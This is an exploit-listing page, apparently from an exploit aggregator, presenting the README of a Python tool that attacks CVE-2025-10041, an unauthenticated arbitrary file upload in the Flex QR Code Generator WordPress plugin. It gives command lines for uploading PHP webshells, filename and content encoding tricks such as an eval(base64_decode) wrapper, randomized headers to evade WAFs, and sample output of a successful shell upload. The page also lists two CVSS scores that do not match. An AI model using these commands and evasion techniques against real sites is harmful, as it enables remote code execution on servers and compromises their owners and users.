Exploit for CVE-2025-10041

Name: Exploit for CVE-2025-10041
Rating: 5 (198 reviews)
2025-10-15 | CVSS 7.6
## https://sploitus.com/exploit?id=E813BC9B-289C-52B3-ACFB-54198750F8EB
# CVE-2025-10041
Flex QR Code Generator &lt;= 1.2.5 - Unauthenticated Arbitrary File Upload
# 🚨 Flex QR Code Generator ≤ 1.2.5 - Unauthenticated Arbitrary File Upload

---

## 📝 Description

The **Flex QR Code Generator** plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the `save_qr_code_to_db()` function in all versions up to, and including, `1.2.5`.  
This allows **unauthenticated attackers** to upload malicious files to the affected site's server, potentially leading to remote code execution.

- **CVE:** `CVE-2025-10041`
- **CVSS:** `9.8 (Critical)`

---

## 💡 About This Script

`CVE-2025-10041.py` is a professional exploit tool designed to automate the attack by leveraging this vulnerability.  
It provides advanced features for bypassing common protections and encoding techniques.

---

## ⚙️ Features

- **Automatic vulnerability detection** (version check)
- **Arbitrary file upload** (including PHP webshells)
- **Filename encoding bypass**: Base64 or URL encoding
- **Content encoding bypass**: PHP base64 wrapper for shell code
- **Randomized HTTP headers** to evade basic WAFs
- **Custom header support**
- **Full command-line interface** with argument parsing and help message

---

## 🖥️ Usage

### 1. **Basic Exploit**

```bash
python3 CVE-2025-10041.py -u http://target.com
```

### 2. **Shell Filename Encoding**

```bash
python3 CVE-2025-10041.py -u http://target.com --encode_filename base64
python3 CVE-2025-10041.py -u http://target.com --encode_filename url
```

### 3. **Shell Content Encoding**

```bash
python3 CVE-2025-10041.py -u http://target.com --encode_content base64
```

### 4. **Custom Shell Filename**

```bash
python3 CVE-2025-10041.py -u http://target.com --shellname myevil.php
```

### 5. **Advanced (Combine Options)**

```bash
python3 CVE-2025-10041.py -u http://target.com --encode_content base64 --encode_filename base64 --shellname myevil.php
```

### 6. **Custom Headers**

```bash
python3 CVE-2025-10041.py -u http://target.com --headers "X-Forwarded-For: 127.0.0.1" "Cookie: PHPSESSID=1337"
```

---

## 🆘 Help

To see all available options and usage instructions:

```bash
python3 CVE-2025-10041.py --help
```

---

## 🔓 Bypass Techniques

- **Filename encoding**: Some servers block `.php` or suspicious names; encoding may evade filters.
- **Content encoding**: Wrapping shell code in `eval(base64_decode(...))` may bypass content filters.
- **Random headers**: Rotating user-agent, referer, and cookies to avoid detection.
- **Custom headers**: Add your own headers for advanced evasion.

---

## 📋 Example Output

```
Checking vulnerability version...
Target is vulnerable ...
Exploiting ...
Uploading shell 'shell.php' ...
Shell uploaded successfully.
Shell path (guess): /wp-content/uploads/shell_3.php
Response: {...}
```

---

## ⚠️ Disclaimer

This script is provided **for educational, research, and authorized penetration testing purposes only**.  
**Unauthorized use** against systems you do not own or have explicit permission to test is strictly prohibited and illegal.  
The author is **not responsible** for any misuse or damage caused by this tool.

---

## ✍️ By:  
*Nxploited (Khaled Alenazi)*

---